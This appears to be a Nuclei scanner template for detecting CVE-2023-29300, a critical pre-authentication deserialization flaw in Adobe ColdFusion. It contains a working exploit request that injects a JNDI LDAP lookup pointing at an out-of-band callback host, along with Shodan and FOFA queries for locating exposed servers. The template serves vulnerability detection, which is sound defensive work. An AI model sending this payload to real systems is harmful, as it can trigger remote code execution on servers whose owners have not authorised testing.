id: CVE-2023-29300 info: name: Adobe ColdFusion - Pre-Auth Remote Code Execution author: rootxharsh,iamnoooob,pdresearch severity: critical description: | Adobe ColdFusion versions 2018u16 (and earlier), 2021u6 (and earlier) and 2023.0.0.330468 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction. reference: - https://blog.projectdiscovery.io/adobe-coldfusion-rce/ - https://helpx.adobe.com/security/products/coldfusion/apsb23-40.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cwe-id: CWE-502 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: max-request: 1 fofa-query: app="Adobe-ColdFusion" shodan-query: http.component:"Adobe ColdFusion" product: coldfusion vendor: adobe tags: cve,cve2023,adobe,rce,coldfusion,deserialization variables: callback: "{{interactsh-url}}" jndi: "ldap%3a//{{callback}}/rcrzfd" http: - raw: - | POST ///CFIDE/adminapi/accessmanager.cfc?method=foo&_cfclient=true HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded argumentCollection=
{{jndi}} matchers: - type: dsl dsl: - contains(interactsh_protocol, "dns") - contains(body, "ColdFusion documentation") condition: and